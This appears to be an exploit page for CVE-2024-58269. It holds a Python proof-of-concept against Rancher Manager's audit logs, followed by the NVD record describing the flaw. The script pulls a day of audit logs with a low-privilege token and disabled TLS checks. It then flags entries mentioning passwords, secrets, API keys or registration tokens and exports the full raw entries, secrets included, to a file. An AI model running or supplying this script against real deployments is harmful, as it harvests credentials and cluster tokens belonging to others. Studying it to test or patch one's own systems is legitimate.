CVE-2024-58269

# CVE-2024-58269 PoC - Rancher Manager审计日志敏感信息泄露 # Requires: Valid Rancher API token with low privileges and audit log access import requests import json from datetime import datetime, timedelta RANCHER_URL = "https://rancher.example.com" API_TOKEN = "token-xxxxx:xxxxxxxxxxxxxxx" HEADERS = { "Authorization": f"Bearer {API_TOKEN}", "Content-Type": "application/json" } def get_audit_logs(since=None, until=None): """获取Rancher审计日志""" params = { "limit": 100, "sortBy": "date" } if since: params["since"] = since if until: params["until"] = until response = requests.get( f"{RANCHER_URL}/v1/auditLogs", headers=HEADERS, params=params, verify=False, timeout=30 ) return response.json() def extract_sensitive_data(log_entry): """从日志条目中提取敏感信息""" sensitive_patterns = [ "password", "secret", "token", "credential", "apiKey", "privateKey", "clusterToken", "importToken", "registrationToken" ] extracted = {} log_data = json.dumps(log_entry).lower() for pattern in sensitive_patterns: if pattern in log_data: extracted[pattern] = "FOUND" return extracted def main(): print("[*] CVE-2024-58269 - Rancher Manager Audit Log Information Disclosure") print("[*] Scanning for sensitive data in audit logs...\n") # 获取最近24小时的审计日志 since = (datetime.now() - timedelta(days=1)).isoformat() logs = get_audit_logs(since=since) sensitive_findings = [] for log in logs.get("data", []): sensitive = extract_sensitive_data(log) if sensitive: finding = { "timestamp": log.get("timestamp"), "eventType": log.get("eventType"), "user": log.get("user", {}).get("name"), "resource": log.get("resource"), "sensitiveFields": sensitive, "rawLog": log # 包含敏感数据的完整日志 } sensitive_findings.append(finding) print(f"[!] Found sensitive data in log entry:") print(f" Timestamp: {finding['timestamp']}") print(f" Event: {finding['eventType']}") print(f" Sensitive Fields: {list(sensitive.keys())}") print() print(f"[*] Total sensitive findings: {len(sensitive_findings)}") # 导出完整结果 if sensitive_findings: output_file = f"cve_2024_58269_findings_{datetime.now().strftime('%Y%m%d_%H%M%S')}.json" with open(output_file, 'w') as f: json.dump(sensitive_findings, f, indent=2) print(f"[+] Results exported to: {output_file}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2024-58269", "sourceIdentifier": "[email protected]", "published": "2025-10-29T15:15:41.077", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in Rancher Manager, where sensitive \ninformation, including secret data, cluster import URLs, and \nregistration tokens, is exposed to any entity with access to Rancher \naudit logs."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "references": [{"url": "https://bugzilla.suse.com/show_bug.cgi?id=CVE-2024-58269", "source": "[email protected]"}, {"url": "https://github.com/rancher/rancher/security/advisories/GHSA-mw39-9qc2-f7mg", "source": "[email protected]"}]}}